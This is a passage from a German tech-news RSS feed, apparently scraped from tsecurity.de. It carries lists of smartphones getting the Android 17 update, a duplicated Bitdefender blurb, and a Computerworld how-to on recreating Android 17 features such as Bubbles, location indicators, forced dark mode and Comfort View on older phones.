<li><a href="https://www.pcwelt.de/article/3145865/vivo-x300-ultra-test.html" target="_blank" rel="noreferrer noopener">Vivo X300</a> / Pro / Ultra / FE</li>



<li>Vivo X200 / X200T Pro / FE </li>



<li>Vivo X100 / Pro</li>



<li>Vivo X Fold 5</li>



<li>Vivo X Fold 3 Pro</li>



<li>Vivo V70 / FE / Elite</li>



<li>Vivo V60 / V60e / V60 Lite </li>



<li>Vivo V50 / V50e / Lite </li>



<li>Vivo V40 / Pro</li>



<li>Vivo T4 / Pro / Ultra / Lite / T4x / T4R</li>



<li>Vivo Y400 / Pro / Pro+</li>



<li>Vivo Y300 GT / Y300t / Y300i</li>



<li>Vivo Y51 Pro</li>



<li>Vivo Y31d 4G</li>



<li>Vivo Y21 (2026)</li>



<li>Vivo Y11 (2026)</li>



<li>Vivo Y05 4G</li>



<li>Vivo Y29s 5G</li>
</ul>



<p><strong>Vivo X300 Pro im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

									<div class="price-comparison__record check_on_amazon">
							<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="amazon" loading="lazy">
															</div>
							<div class="price-comparison__price"></div>
							<div>
								<a class="price-comparison__view-button" href="https://www.amazon.de/s?k=Vivo+X300+Pro&amp;tag=pcwelt.de-21&amp;ascsubtag=rss">Bei Amazon ansehen</a>							</div>
						</div>
								
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Asus</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a378efa1cc07"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/01/Asus-zenphone.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Asus zenphone" class="wp-image-3036644" width="1200" height="544" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p></p>
</figcaption></figure><p class="imageCredit">Asus</p></div>



<p>Asus hat Anfang 2026 angekündigt, vorerst keine neuen Smartphones zu produzieren. Das heißt aber nicht, dass bereits bestehende Modelle keine Updates mehr erhalten.</p>



<p>Folgende Asus-Smartphones erhalten voraussichtlich das Update auf Android 17:</p>



<ul class="wp-block-list">
<li>ROG Phone 9 / <a href="https://www.pcwelt.de/article/2551760/asus-rog-phone-9-pro-test.html" target="_blank" rel="noreferrer noopener">9 Pro</a></li>



<li>ROG Phone 8 / <a href="https://www.pcwelt.de/article/2202783/asus-rog-phone-8-pro-test.html" target="_blank" rel="noreferrer noopener">8 Pro</a></li>



<li>Zenfone 12 Ultra</li>



<li>Zenfone 11 Ultra</li>
</ul>



<p><strong>Eher kein Android 17:</strong> ROG Phone 7, ROG Phone 7 Ultimate, Zenfone 10.</p>



<p><strong>Asus ROG Phone 9 Pro im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Asus</span>
													</div>
												<div class="price-comparison__price ">
						<span>1.299,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://rog.asus.com/de/phones/rog-phone-9-pro/" data-vars-product-name="Asus ROG Phone 9 Pro" data-vars-product-id="2524258" data-vars-category="Smartphones" data-vars-manufacturer-id="11291" data-vars-manufacturer="Asus" data-vars-vendor="billiger,gtin,mpn,Asus" data-vars-po="billiger,gtin,mpn" data-product="2524258" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://rog.asus.com/de/phones/rog-phone-9-pro/" data-vars-product-price="1.299,00 €" data-vars-product-vendor="Asus" aria-label="Deal anschauen bei Asus für 1.299,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Was kann ich tun, wenn mein Gerät kein Android-Update mehr bekommt?</h2>



<p>Wenn Ihr Smartphone keine großen Android-Updates mehr erhält, ist das erst einmal kein Grund zur Panik. Hersteller liefern eine feste Anzahl an Updates aus, die neue Funktionen und Verbesserungen beinhalten. Darüber hinaus gibt es aber auch noch kleinere Updates sowie wichtige Sicherheits-Updates, die unabhängig vom Update auf Android 17 sind.</p>



<p>Sollte sich Ihr Gerät also nicht in der Liste der Modelle befinden, die Android 17 bekommen, prüfen Sie am besten gleich, ob es generell noch Support bekommt, damit Probleme und Sicherheitslücken weiterhin behoben werden. Sollte das nicht der Fall sein, können Sie über die Anschaffung eines <a href="https://www.pcwelt.de/article/1924183/das-beste-smartphone-im-test.html" target="_blank" rel="noreferrer noopener">neuen Smartphones</a> nachdenken, oder Sie installieren ein <a href="https://www.pcwelt.de/article/2990255/beste-alternativen-zu-google-android.html" target="_blank" rel="noreferrer noopener">alternatives Betriebssystem</a>.</p>



<p><strong>Lesetipp:</strong> <a href="https://www.pcwelt.de/article/3156260/ihr-android-handy-hat-ein-ablaufdatum-jetzt-herausfinden.html" target="_blank" rel="noreferrer noopener">Ihr Android-Handy hat ein Ablaufdatum: So finden Sie es heraus</a></p>



<p></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[2026 Gartner Magic Quadrant for Endpoint Protection - Bitdefender]]></title>
<description><![CDATA[Europäische Cybersicherheit für digitale Souveränität. Digitale Souveränität und wirksame Sicherheit sollten kein Entweder-oder sein. Als Notable ...]]></description>
<link>https://tsecurity.de/de/3612692/it-security-nachrichten/2026-gartner-magic-quadrant-for-endpoint-protection-bitdefender/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3612692/it-security-nachrichten/2026-gartner-magic-quadrant-for-endpoint-protection-bitdefender/</guid>
<pubDate>Sat, 20 Jun 2026 21:38:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Europäische <b>Cybersicherheit</b> für digitale Souveränität. Digitale Souveränität und wirksame Sicherheit sollten kein Entweder-oder sein. Als Notable ...]]></content:encoded>
</item>
<item>
<title><![CDATA[2026 Gartner Magic Quadrant for Endpoint Protection - Bitdefender]]></title>
<description><![CDATA[Europäische Cybersicherheit für digitale Souveränität. Digitale Souveränität und wirksame Sicherheit sollten kein Entweder-oder sein. Als Notable ...]]></description>
<link>https://tsecurity.de/de/3612218/it-security-nachrichten/2026-gartner-magic-quadrant-for-endpoint-protection-bitdefender/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3612218/it-security-nachrichten/2026-gartner-magic-quadrant-for-endpoint-protection-bitdefender/</guid>
<pubDate>Sat, 20 Jun 2026 14:52:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Europäische Cybersicherheit für digitale Souveränität. Digitale Souveränität und wirksame <b>Sicherheit</b> sollten kein Entweder-oder sein. Als Notable ...]]></content:encoded>
</item>
<item>
<title><![CDATA[How to bring the best Android 17 features to any Android phone today]]></title>
<description><![CDATA[Google’s latest and greatest Android version is officially now out in the world and available — but if you’re using any phone other than a Pixel, that doesn’t mean much for you just yet.



The reason why is simple: Despite Google officially launching Android 17 and starting to send it out to And...]]></description>
<link>https://tsecurity.de/de/3609957/it-nachrichten/how-to-bring-the-best-android-17-features-to-any-android-phone-today/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609957/it-nachrichten/how-to-bring-the-best-android-17-features-to-any-android-phone-today/</guid>
<pubDate>Fri, 19 Jun 2026 12:02:48 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Google’s latest and greatest Android version is officially now out in the world and available — but if you’re using any phone other than a Pixel, that doesn’t mean much for you just yet.</p>



<p>The reason why is simple: Despite Google <a href="https://blog.google/products-and-platforms/platforms/android/android-17-features" target="_blank" rel="noreferrer noopener">officially launching Android 17</a> and starting to send it out to Android phone-owners this week, it’s up to each individual device-maker to process the software and deliver it to its customers. And outside of Google itself, unfortunately, most Android device-makers are <a href="https://www.computerworld.com/article/4103529/android-16-upgrade-report-card-2.html">exasperatingly unreliable about making that happen</a> — some of ’em to <a href="https://www.computerworld.com/article/4177363/motorola-android-phones.html">almost comically bad extremes</a> (insert exaggerated sigh here).</p>



<p>Hold the phone, though — ’cause there <em>is </em>some good news here: While we can’t force any Android phone-maker to start treating software support as a priority, we <em>can</em> get creative and find ways to bring interesting new Android features to devices running older <a href="https://www.computerworld.com/article/1714347/android-versions-a-living-history-from-1-0-to-today.html">Android versions</a>. In fact, all four of <a href="https://www.computerworld.com/article/4185786/google-pixel-android-17.html">the Android 17 features I called out earlier this week</a> can be emulated on <em>any</em> Android phone this instant. All it takes is a teensy pinch of inspiration and a dash of tenacity — and, of course, the right roadmap to make it all come together.</p>



<p>The tenacity’s on you, but if you’re game, I’ve got your roadmap ready. Here’s exactly how to enjoy a similar sort of Android-17-style sorcery on whatever phone you’re using right now — as far as some of the more surface-level highlights, at least — without having the actual Android 17 upgrade in front of you.</p>



<p><strong>[Get fresh Android tips in your inbox with </strong><a href="https://www.theintelligence.com/android-cw/" target="_blank" rel="noreferrer noopener"><strong>my free Android Intelligence newsletter</strong></a><strong> — one new and useful thing to try every Friday!]</strong></p>



<h2 class="wp-block-heading"><strong>Android 17 feature #1: Bubbles multitasking magic</strong></h2>



<p>The most shape-shifting Android 17 of all, without a doubt, is Bubbles — a snazzy new way to turn any app into a floating, collapsible window that’s readily available for on-demand access but also out of your hair when you aren’t actively using it.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/android-17-bubbles.webp" alt="Android 17 Bubbles" class="wp-image-4185801" width="800" height="814" sizes="auto, (max-width: 800px) 100vw, 800px"><figcaption class="wp-element-caption">Android 17’s Bubbles multitasking system in action.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>I <a href="https://www.computerworld.com/article/4143157/android-multitasking.html">wrote about Bubbles and ways to achieve similar feats</a> just a few months back. It’s surprisingly easy to accomplish, even without Android 17 in the picture.</p>



<p>Look over <a href="https://www.computerworld.com/article/4143157/android-multitasking.html#:~:text=Android%20Bubbles%20today%3A%203%20crafty%20options">this list of crafty Bubbles-bringing workarounds</a> and see which makes the most sense for you. One way or another, you’ll find yourself facing a fantastic new option for multitasking anytime you want it — no waiting or out-of-reach upgrades required.</p>



<h2 class="wp-block-heading"><strong>Android 17 feature #2: Smarter location access</strong></h2>



<p>Our next Android 17 addition is a <em>little</em> trickier to emulate without the actual operating system update in the equation. But fear not, for this is Android — and when there’s a will, there’s a way.</p>



<p>The feature of which we speak is an expansion of Android’s framework for how apps can access your location. It’s a two-parter: First, whenever any app is accessing your location, you’ll now see a blue dot appear in the upper-right corner of your screen — and if you swipe down once from the top of your screen to open your notification panel, you can actually tap on the location icon that appears in its place to get detailed info about exactly which app or apps are involved. Second, when an app asks to access your precise location, Android 17 adds in the option to allow such access only temporarily — for that one brief moment and purpose — without giving the app permanent permission for ongoing use.</p>



<p>The second part, unfortunately, is challenging to achieve without Android 17 being present. But the first part <em>is</em> something we can make happen with a sliver of creative zest.</p>



<p>The trick revolves around a classic third-party app called <a href="https://play.google.com/store/apps/details?id=rk.android.app.privacydashboard&amp;hl=en_US" target="_blank" rel="noreferrer noopener">Privacy Dashboard</a>. Privacy Dashboard came about <a href="https://www.computerworld.com/article/1614674/android-12-privacy-upgrade.html">back in the Android 12 era</a>, when Google first introduced a full-fledged privacy dashboard into Android and certain devices were lagging behind and taking too long to adopt it.</p>



<p>With Android 12 now being five years old, the app hasn’t had much need in recent years — until now. Interestingly enough, the ability to see full details about ongoing location access and then tap to adjust the associated app’s settings is something Privacy Dashboard has long offered. And it’s consequently a great way to bring that newfound native ability from Android 17 onto a device running an older Android version.</p>



<p>The catch is that because of the limited need for the app all this time, it’s no longer being actively developed — and as a result, if you hadn’t previously downloaded it, the Play Store will probably give you an error saying it’s made for an older Android version and can’t be installed on your device.</p>



<p>It <em>will</em> still work, though, and it’s perfectly functional and effective.</p>



<p>Provided you’re comfortable and that this won’t violate any of your company-associated policies, you can <a href="https://drive.google.com/file/d/1mx9SjEcq2qPIelP017lwSISRPzF2Nj6D/view?usp=sharing" target="_blank" rel="noreferrer noopener">download the original verified Privacy Dashboard app package from my own personal Drive storage</a>. I saved it using the <a href="https://www.computerworld.com/article/1718187/android-file-manager-apps.html">Google Files file manager</a> and then uploaded it directly to Drive. It’s quite literally the same exact app you’d get from the Play Store, if the Play Store would let you download it — and while I wouldn’t often advise installing apps from unknown sources, I don’t exactly consider myself to be “unknown” (most of the time). So as long as you share that same trust, you can grab the app from me and put it on any device you want.</p>



<p>Once you get the app installed and give it the permissions it needs to operate, open ‘er up and tap the “App Settings” options on its main screen. Tap the line that says “Indicator Customization,” beneath “Privacy Indicators,” then flip the toggle next to “Click action” into the on and active position.</p>



<p>Aaaaand, that’s it: Anytime an app is accessing your location, you’ll see a green location icon appear in the upper-right corner of your screen. And tapping it will take you to the system-level timeline of exactly which apps have accessed your location recently, for added context.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/android-17-privacy-dashboard-location-indicator.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Android 17 Privacy Dashboard location indicator" class="wp-image-4185875" width="1024" height="859" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Privacy Dashboard was ahead of its time with its Android-17-reminiscent location access indicators.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>Before you install Privacy Dashboard, you might also want to try just opening an app that you know accesses your location — like Google Maps — and seeing what, if any, indicator appears in the corner of your screen and if you can tap it. While that ability is technically associated with Android 17, it was actually included in an earlier Android quarterly update, and it’s possible your device may already have that piece of the puzzle in place even if it isn’t yet running Android 17.</p>



<h2 class="wp-block-heading"><strong>Android 17 feature #3: More dynamic dark mode</strong></h2>



<p>Android’s dark mode is better than ever as of Android 17, with a nifty new way to force each and every app to respect your device-wide dark mode setting and adjust its interface to a less glary look — even if it doesn’t technically support the option.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/android-17-dark-theme-expanded.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Android 17 dark theme expanded " class="wp-image-4185802" width="1024" height="842" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Dark mode in Android 17 includes a useful new “Expanded” option.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>Well, get this: If your phone’s Android software is reasonably recent, it’s entirely possible you can unlock the very same function by adjusting a few out-of-sight system settings.</p>



<p>Try this:</p>



<ul class="wp-block-list">
<li>First, you’ll need enable Android’s developer options, if you haven’t done that previously.
<ul class="wp-block-list">
<li>That’s a special, typically hidden section of Android’s system settings with all sorts of advanced options that aren’t typically intended for average phone-usin’ folk to futz around with.</li>



<li>There’s no risk to you or your phone with enabling ’em, and as long as you follow the instructions here exactly and enable only the one single setting we’re about to go over, it’s actually quite easy. (It’s also quite easy to undo, if you ever decide you aren’t into it and want to go back.) But we <em>are </em>pokin’ around in an area of Android that’s meant mostly for developers, and if you veer off-course and mess with the wrong setting, you could make a mess — so follow the steps closely, capisce?</li>
</ul>
</li>



<li>The process for enabling Android’s developer options may sound strange, but I swear it works: Head into the “About phone” section of your system settings, tap “Software information,” if needed, then find the line that says “Build number.” Tap your finger on it seven times, then enter your PIN or password, if prompted, and confirm that you want to activate the developer options.</li>



<li>Now, go back to your main settings screen and either tap on the “Developer options” that appears within that list or tap “System” and <em>then</em> tap “Developer options” from there.</li>



<li>Scroll down through that section until you see an option called “Force Dark mode.” Flip the toggle next to it.</li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/android-17-dark-theme-expanded-developer-settings.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Android 17 dark mode expanded - developer settings" class="wp-image-4185882" width="1024" height="762" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Android’s developer settings holds the secret to Android-17-style “Extended” dark mode, even on older Android versions.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>And there ya have it: You should now be able to open any app, even if it doesn’t officially support dark mode, and see it shift into a darkened state whenever you have dark mode enabled at the system level. </p>



<p>Easy peasy, no?</p>



<h2 class="wp-block-heading"><strong>Android 17 feature #4: A more comfy all-around view</strong></h2>



<p>Our final Android 17 feature is a saucy little somethin’ called Comfort View. It applies a softer, pastel-oriented filter to your display with automatic adjustments based on your current viewing environment in order to make your screen easier on the eyes.</p>



<p>If you’re using a Samsung device, you may already have something similar in place even with an older Android version. Look in the Display section of your system settings and see if you see something called “Adaptive color tone,” then try activating it if it’s there — and/or look for “Screen mode” and play around with some of the settings in that area to see vaguely similar sorts of adjustments. It isn’t quite as intelligent or automatic as the new incoming Android-level equivalent, but it’s a start!</p>



<p>In any other scenario — or if you just want more nuance and control, even with a Samsung gizmo — grab an app called <a href="https://play.google.com/store/apps/details?id=com.urbandroid.lux&amp;hl=en" target="_blank" rel="noreferrer noopener"><strong>Twilight</strong></a>. It’ll let you tweak all sorts of specifics about the appearance of your screen, and while it’s presented mostly for nighttime optimization, you can use those same controls to create your own custom modes for any scenario imaginable.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/android-17-comfort-view-twilight.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Android 17 Comfort View - Twilight" class="wp-image-4185874" width="1024" height="893" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Twilight can help you recreate effects similar to Android 17’s Comfort View.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>The app doesn’t collect or share any manner of data, and while it does offer a $10 Pro upgrade, the free version is perfectly functional for most purposes.</p>



<p>And with that, give yourself a pat on the back: Your phone is officially now set up to showcase some of Android 17’s finest flavors — even without the software itself being available to you yet.</p>



<p>That, my friend, is quite an accomplishment. Well done.</p>



<p><em>Don’t stop there: </em><a href="https://www.theintelligence.com/android-cw/" target="_blank" rel="noreferrer noopener"><strong><em>Come check out my free Android Intelligence newsletter</em></strong></a><strong><em> </em></strong><em>to get something new and useful in your inbox every Friday — and get my awesome Android Notification Power-Pack today.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Android 17: Diese Smartphones bekommen das Update]]></title>
<description><![CDATA[Android 17, das neueste Update von Googles Betriebssystem, ist endlich erschienen und bringt einige spannende Neuerungen für Android-Nutzer. Darunter neue Funktionen, verbesserte Sicherheit und vieles mehr.



Höchste Zeit also, zu prüfen, welche Smartphones das Upgrade auf die neue Version überh...]]></description>
<link>https://tsecurity.de/de/3609524/it-nachrichten/android-17-diese-smartphones-bekommen-das-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609524/it-nachrichten/android-17-diese-smartphones-bekommen-das-update/</guid>
<pubDate>Fri, 19 Jun 2026 08:32:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://www.pcwelt.de/article/2990238/android-17-release-features-update-2.html" target="_blank" rel="noreferrer noopener">Android 17</a>, das neueste Update von Googles Betriebssystem, <a href="https://www.pcwelt.de/article/3167761/android-17-ist-endlich-da-so-bekommen-sie-das-update.html" target="_blank" rel="noreferrer noopener">ist endlich erschienen</a> und bringt einige spannende Neuerungen für Android-Nutzer. Darunter neue Funktionen, verbesserte Sicherheit und vieles mehr.</p>



<p>Höchste Zeit also, zu prüfen, welche Smartphones das Upgrade auf die neue Version überhaupt erhalten! Welche Smartphones immer noch aktualisiert und auch mit <strong>Android 17 </strong>versorgt werden, verrät unsere Übersicht. Diese ist nach Marken sortiert und enthält auch Links zu unseren Testberichten der jeweiligen Modelle.</p>



<p>Da die Hersteller aktueller Smartphones <a href="https://www.pcwelt.de/article/2808830/ab-20-juni-2025-laengerer-support-fuer-smartphones.html" target="_blank" rel="noreferrer noopener">seit 2025</a> dazu verpflichtet sind, mindestens <strong>fünf Jahre </strong>lang Updates für ihre Geräte zu liefern, fällt die Liste recht ähnlich zu der von <a href="https://www.pcwelt.de/article/2814156/android-16-diese-smartphones-bekommen-das-update.html" target="_blank" rel="noreferrer noopener">Android 16</a> aus. Einige Geräte fliegen in diesem Jahr aber dennoch aus dem Update-Zyklus heraus (siehe <a href="https://www.pcwelt.de/article/3129020/android-17-diese-smartphones-bekommen-das-update-nicht-mehr.html" target="_blank" rel="noreferrer noopener">Android 17: Diese Smartphones bekommen das Update nicht mehr</a>).</p>



<p><em><strong>Hinweis:</strong> Einige Hersteller treffen klare Aussagen bezüglich der geplanten Update-Zeiträume ihrer Geräte. Andere halten sich nur grob an die EU-Richtlinie. Genießen Sie die Angaben also mit Vorsicht, denn spontan kann sich immer etwas ändern.</em></p>



<h2 class="wp-block-heading">Google</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a34e26275ea3"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/Google-Pixel-10a-review-3.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 10a review 3" class="wp-image-3078312" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Chris Martin / Foundy</p></div>



<p>Google liefert bekanntlich als erstes Update auf Android 17, da es keine weiteren Anpassungen für die hauseigenen Pixel-Smartphones vornehmen muss. Der Rollout ist hier bereits gestartet. Durch die erweiterte Update-Garantie von Google fallen im Vergleich zu Android 16 auch keine Geräte raus.</p>



<p>Diese Google-Smartphones werden das Update auf Android 17 bekommen:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3065303/google-pixel-10a-vorgestellt-preis-erscheinungsdatum-farben-specs.html" target="_blank" rel="noreferrer noopener">Pixel 10a</a></li>



<li><a href="https://www.pcwelt.de/article/2921090/google-pixel-10-test.html" target="_blank" rel="noreferrer noopener">Pixel 10</a></li>



<li><a href="https://www.pcwelt.de/article/2894857/google-pixel-10-pro-test-2.html" target="_blank" rel="noreferrer noopener">Pixel 10 Pro</a></li>



<li>Pixel 10 Pro XL</li>



<li><a href="https://www.pcwelt.de/article/2945312/google-pixel-10-pro-test-3.html" target="_blank" rel="noreferrer noopener">Pixel 10 Pro Fold</a></li>



<li><a href="https://www.pcwelt.de/article/2687125/google-pixel-9a-test-2.html" target="_blank" rel="noreferrer noopener">Pixel 9a</a></li>



<li><a href="https://www.pcwelt.de/article/2434705/google-pixel-9-test.html" target="_blank" rel="noreferrer noopener">Pixel 9</a></li>



<li>Pixel 9 Pro</li>



<li><a href="https://www.pcwelt.de/article/2434665/google-pixel-9-pro-xl-testbericht.html" target="_blank" rel="noreferrer noopener">Pixel 9 Pro XL</a></li>



<li><a href="https://www.pcwelt.de/article/2434665/google-pixel-9-pro-xl-testbericht.html" target="_blank" rel="noreferrer noopener">Pixel 9 Pro Fold</a></li>



<li><a href="https://www.pcwelt.de/article/2111264/google-pixel-8-test.html" target="_blank" rel="noreferrer noopener">Pixel 8</a></li>



<li><a href="https://www.pcwelt.de/article/2103410/google-pixel-8-pro-test.html" target="_blank" rel="noreferrer noopener">Pixel 8 Pro</a></li>



<li><a href="https://www.pcwelt.de/article/2779688/google-pixel-8a-test.html" target="_blank" rel="noreferrer noopener">Pixel 8a</a></li>



<li><a href="https://www.pcwelt.de/article/1812910/google-pixel-7-test-smartphone.html" target="_blank" rel="noreferrer noopener">Pixel 7</a></li>



<li><a href="https://www.pcwelt.de/article/1352376/google-pixel-7-pro-im-test.html" target="_blank" rel="noreferrer noopener">Pixel 7 Pro</a></li>



<li><a href="https://www.pcwelt.de/article/1815523/google-pixel-7a-test.html" target="_blank" rel="noreferrer noopener">Pixel 7a</a></li>



<li><a href="https://www.pcwelt.de/article/1200502/google-pixel-6-im-test.html" target="_blank" rel="noreferrer noopener">Pixel 6</a></li>



<li><a href="https://www.pcwelt.de/article/1200514/google-pixel-6-pro-im-test-vertrautes-android-erlebnis-in-neuem-gewand.html" target="_blank" rel="noreferrer noopener">Pixel 6 Pro</a></li>



<li><a href="https://www.pcwelt.de/article/1206583/test-google-pixel-6a.html" target="_blank" rel="noreferrer noopener">Pixel 6a</a></li>
</ul>



<p><strong>Google Pixel 10 Pro XL im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>939,00 €</span>						</div>
						<div>
